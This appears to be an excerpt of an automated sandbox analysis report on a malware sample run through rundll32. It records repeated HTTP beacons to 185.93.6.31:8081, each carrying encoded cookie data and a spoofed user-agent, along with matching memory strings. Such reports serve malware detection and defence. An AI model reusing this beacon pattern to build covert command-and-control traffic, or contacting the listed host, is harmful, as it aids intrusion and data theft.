          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=6xT-pWfs_HV8Pq1iUeDOTbDYUVtD6DdycCVRRIzKvmoLlGNxF0dK7SS-P0NL38ugk7gWC83ASdw3YP56JHODzeSD22ePQWAfwKaJS4sineMb3gZ_fz_ll5mtj3m4rrxBGysn6YLO6ZjM_Yg5xNkRGhqEzaBzDcG3BmOBwk-Fi0jtW4DpUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7OY85EmPSEpL07blBmgrLbuhisYbu9N7bAT1VskFM1CfDLqVfHHMf67ZUWdzm34owXoBDjJAr-DpY10OkSM1h_ZPwGPYJgJKUPj6ZWmd8rLGLtnw2GsaHuTcvC1zo3AVGbkY86zqyk5yIF_iG3lNTF1XYM5R-MgSfFLHCDP141WCu3UEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xB6RwEnpLtBQ2kZ_7gW2vxJeZ5mJ7HzjOzByR54ekh5rvWqPyNW8n5lfPOfJdfyku1sU9OuANPCJdBXactJ5XxQVl4yrPYayWzexOQxuJ8Fy8xFrtn-kbn9QmI4IYFTXsbDJufOIqKrRLmC3PajUVL9Q0NIlHFkocGFabfHRLtyms_fvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=23bv4FeO7TBMXLwnYYLfCIC6QB5ziiY3QEdAAbyory879nI0JyVbqBTcLgZ7vdrlo9oHTv2iWJkHAu8_FBGSiNThyiK_I3Fa8MSYDrtAjKYrvBc6T1300qnPnjyIzK0EK0k2rLKs-N38n5l89LsAXyrm3OVDb9DyNgGQh3_nmg3dOZGsUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=gxJkDCZ7EKIkJ-4NaZxzxdRV0i50T4uTA_Ctvqbxa7jw-OJ9E4WUl8EtCY8cbybAro5Z5l209wiGlwXm_tdtb5m7mIu30lqiPwyijQZpqlqp2oEYt59C9oso5MUcVyj9dk1AG8MekqYd1AcKdI0VpDKjOCY-DJD6E6af4FwBu73tTy3sUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=WCtMTtXc817M75vxcjBrMY5ruhcV2aFtpwWvyQIrT5D3iLcBVOBhEQVq4WlVQCEqJ27Jene16X4VQchU7uek0YggSgI3CFs8xwJst5Bb-k_uxszlKkp54ONlRQCUVYlZLYUUN2-9dSRNG705oZ0J2iNlDVy5KYSm7FSH423k81I6hiphUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=1IRqMVh8aOFDrjn2bnBa2Y9Ixc98eKPmT7XF0LNaKv40BPflKNfeeRsuq9d0T180rCiCn_JQ3UgI8GruG-MXWdsTT_Ow0fSL_zYd37SyCXckTpLrQK9xA6Y9G-2HPijVJLuzfb1efQzzbRyt-0mFjiUUWTRMnVUjOfMVVnAVH9zSyxR9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LCNUaYlKIMeLFt5oxq1DoHtk4kvbfrv2rMGd2wnAW91fydIYvLSk8m4cOeqzXhalAb9pg_KFx20ppjWDUeZdCjaKqO4Y42rHkD2S6KlYmj8G67F9GK5ykyQZ1KCzZhiY2XxwfmwvosOy5Tdv27wlwZ2SCEORPaCfvJevhfMwi9hCfh2JUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wvwn9k8LmOZWOPBJ6OcAiRS80a-PDsrVPdLEcZj8JChtX9y5zjcKqZ-9itHPl0qSvbmiwu1igsaPlqPsdDDPaRL3Ibqt3zCEXdUHDwqMkfd0EaddsJ0SWHmyLrgOguLht1J_j_VqHpzXzNaBO0piYrmyZuQj_u8edoPsW_czmOqgUUHZUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=F3tSopuDUHKAUQFlrY9iSky3_Vy_h5t1jEr9Q3ClEm33-8926yjm6tjRk0S3sGenb9e6DDGv5dvLD1J92Bwvyhjsd2BzLswYPMklTHdNMeTnsap4g1BJkGXCI35EwRBG50SL7n6hRZ8wkiQ-OLa9HebrYaePYm2w-gwtxbPqJ08RNCzuUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=MwlQXZZgJPOUPNpc2YdHlGRO5n_EVL_Cs-uZ7xbqX-lA49Yso56gxnE2Pd6sdBKRHpVtt-2vw1k2jDG3TsxZPimgrNoHyW7zjxeW3LZyngsZwbVJB4R2pzsz0JSsTBysxlZ0SnMFpvetzzNbxJYh9YK4DHeOF6Sro72rsewaj-xdVBm9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VumxgtoRs1LBw-JF7B2Bag0lHnz-FXhVzdgeYzE38U22aSxWqroFyplDcGT2IoSHLkVZLHA9BvuKnbFdmY7M6ll-lEAyvC84fVvGbDbf0sSmI0lYwsKqsCRQwF4FU_NmptZozj8zpr9xAMceeSRePad5gofO8I6Qu57O5fJ4xG9Qps_OUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=cSQEdPzTu2Tl4NPLWz8jC6dk8i081ulXjgrn8yskB6reh_87fe8pKyxlqVN8T2kQDmGBQF66oUQ8ToBux-js66EvAjgeBxMG7g0kjblUsnXHyYTfA0Ux2spqDTq9WsFjBIpcDUayPR5kFPUDiJJB4ApqRWaQJsycxVvP2UTru2gTiWJbUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=njlWhztQIik5DNyGdLdBTsl-4KVpZLkYHtufNbvaWTPt09D2Dq6mHNwGOwQBRBRLs6VrbUCfxYObvDdt4_xf5ISQqgCq-WgpIieQBhtCmNG08bOTqrRwfZYD1k4BfBp2a2ZykN41oC0A_zWBaaYnLy-ICq0jJ6JxDo2ta0EqiTbwZB9nUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=v57xvjJpTq4rWiYBlYXWwWneB-fybBydQLASOeWe8mAQPQrxs1Xc4eLfXJmy9ZzawNt0ipAAVI7y9HWkCVIZIW-V9_LQvebMILfRR3fuR78Jc3EVzf_EEATQ-PBz4DSpyjCpx4gIyNSqrgDJRii0KsTQsKxenDlWC-E6E4pRTqLdM5eRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zv9990IHfydZ1S4wdAtNH5Uz0glmA7QgVc7SFqkhPTguf-AjMqzJvwFVvBFuNEjytlOVWegryo4Si30oAZgAn8FoWDWqquNN5U0KGa7JHrE-NYUtWtRmxbxGDCudRT8TPsCku6clasrpFgtr4TKSSD9vTvJW5kLlI4gCkGpuCBrIsAO7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=a3l4b84QDMHMTPJugfdvpjw-zk2cJJfw65ux3U6ad9sYk_4e--6I9ClGFez0BDqjRuVFhbXf62tu_BmFFrxxDHHQhOhfuUbB12e-7u4CtjlBsZ17X_RelWND-Kb0PDSeniZceCt1jsX1vxtpnOYJx9rIJEXWZ4yZ-82Dg7Rqp94FJDGPUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wazc5UxbY_VVaAta67f7mhfsKryMXjHGPoI_Ypus3ztuDyeqzWfxupztccLMx7GBvulZ0e4yedWMxlj_d2A0ehGn2qmuj8uXXoX8HAncauR3QVxOs83pS3ri1asN0hnytAKEnPY65Y_UnC2SOBqZcbrinfcgrhQNddMXSPRjY_mjAbrKUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xHFrq0iJaXtTWzhsfoVbQ5-9xFVsjaJ8X0DESqOvK2Qk8fZ_OCLf4wvbqk1kul6uvN2DBeKl3NIYBWt0CxYWw8vmTmmgJPUR78McRaRHCO00u5NxUFpwmbbIGneXyylPNE6y562rfJbjmB0367yEFDXhWK5caFS5KQYUzGDgHkbCPhXnUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fb4kWdjXUPfai65YlzAzkCr5knuK48vG_Vzt61hdK-0OVKIo7SnUwj-BSdriw2aVUCIZs6MYt114O0WzAHstOmcX2N5Jfhr3waDi2PjF6g9XdsFNSTMCo3WEpJDi-2ioiOEATj2y0vPjeEdfiiFV8cwPeHPAoNCv7QrftaKt--gT4225User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qy64ZifWurY8BOuhEdqIjvDiF5gD0nGxMB8Xh8zw-KlLriWyV30MLmSEeYAL5Y1j04JQyI36Dx93Wri5ZEnFDqS5naTPeybcgJzPiMsY2yBb5EC8PwWjVNmXybr4lPqCWxFhKsL0r1uMx876hONX2Vq-i2MzN4d0RlnHAQ-_zYutYcYqUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=r_odTyINol87PsrwheE6MHm66xbiCPBsUNT-yPX6HpEAWeYAozEwEPK7sGiikXAr0L-Ye4BkuH_ikJlVGTb10H_xGwPA2Qo9MNM9tmeKq04ZF53k3Zso4RS0FAFjhNhY2lRFNphsJCW6yuw4VkxY29S0XF1O-NWnG4XW4po1olPNV3tgUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xSBMbWBJOMNiFcZsL65bpJJn-k8yfaPyRcKF3-DDQ9m2ysocVbe89ocfIe5aXQ6h6LxxhxuG32nApS2HuOVFDt-JsOrx4HLDeT6K7EBbgjvv6Kl58a1ql80azKRaZQCcMH9oeoUsusdb5i9rMr89xXSREEd4PribVZS3gRozk9yrfQWNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=V7L_yNtK_RjAmKwP7UbPIAx-UDb_TjYfzINQKTBsvwe3MmIcq-FLgJgYPi73ecrNLx4XZnFmSLGLxv8XmNWCoFgl2goz52FyfACIJjeEnI6neAcSw5nk-iULjhQECL0sp40mhD5o6PVwW4lUeH8Qd6YizM3Pq8DausWAr_MjiiVR_YGEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LM835qE4iPa4C-BZBtQQmfqPwb9hPdrF0-HUYXbPNDiDbMypIAQauXGOmsEhpFqCU4qy0gNRktZhpbP8mgPfefzEMapD7CCUs-YXH-S_geeaIrdNXq4CSJeBPqjgsfLxWWFvnxtZDow5_8aR1XlycleBdvTNzf8OmLD8SxkAiPpOYlHJUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=GfTawrydrmy-wVDD83rNC06zbODuqTVdmRYTcDwX1XZqHlyziWMqWVvLt0GGiZgONGjnKMdSScYccbsoZDHToQNdJkUtNORspeocQ5yPFJQzPD_WLXn8OBHOWguGsZYz7Kv-1Vn4LGiHMrnE7muraqhFhuik6i40iUAhLsbnBXN3qZMiUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aE_wOOS38uj_ZaP_0rvA0DODX8bAsznv835f2Q-RsPeIz23slBxEcKflMd7IhMU9EOMYlk6bR0G0O_DnpyiNUGfY1foMGm6CQ_2H1gh5k36YhQji_GTrChr2geQ79bLcmHApdAGV5wVPpoakR4Ifh5nfwz3wVs8qhTiPX8zehdVuAI50User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rYKwfiB1D245RmfBh5mXAXvCRifgcF1dUqxT-feCs6ACIUsxoUmdIfDDHVmg6d0a0sc1SoIcFU7g6DRkG05Y4X2JtjLCoacMMquQh2XyBn8bbzDV3-OF0BbMuTBh_HVp2CzoB5oUiRS4skEJVDT16tbM8WxMgHiWGf1705hND2LPL9ZRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=tbLArRDbtAMSh0qsXzzXZOL1do9C7y8yNVAJH5BRzxnGWEbcJSUwNveNrS4qz4JhmC79R2sUU6mwN6FHyHfJzq8bPCqBcv4DCawGLDDJDvufeiW5gT_mV72IQGQq94xcQO3kuvW-NgcrdKOrQi2xBQQDnIcIrDRbJQY7QWqhHxzb74lNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficTCP traffic: 192.168.2.7:49740 -> 185.93.6.31:8081
          Source: Joe Sandbox ViewASN Name: CDN77GB CDN77GB
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: unknownTCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ
          Source: rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ$
          Source: rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ-/E
          Source: rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ4899f5f57b9a
          Source: rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ5K
          Source: rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8
          Source: rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8-
          Source: rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJE
          Source: rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJMK
          Source: rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJMQ
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJOMDCBHADPPFCEHFDNPACA
          Source: rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJT
          Source: rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpString found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJeK
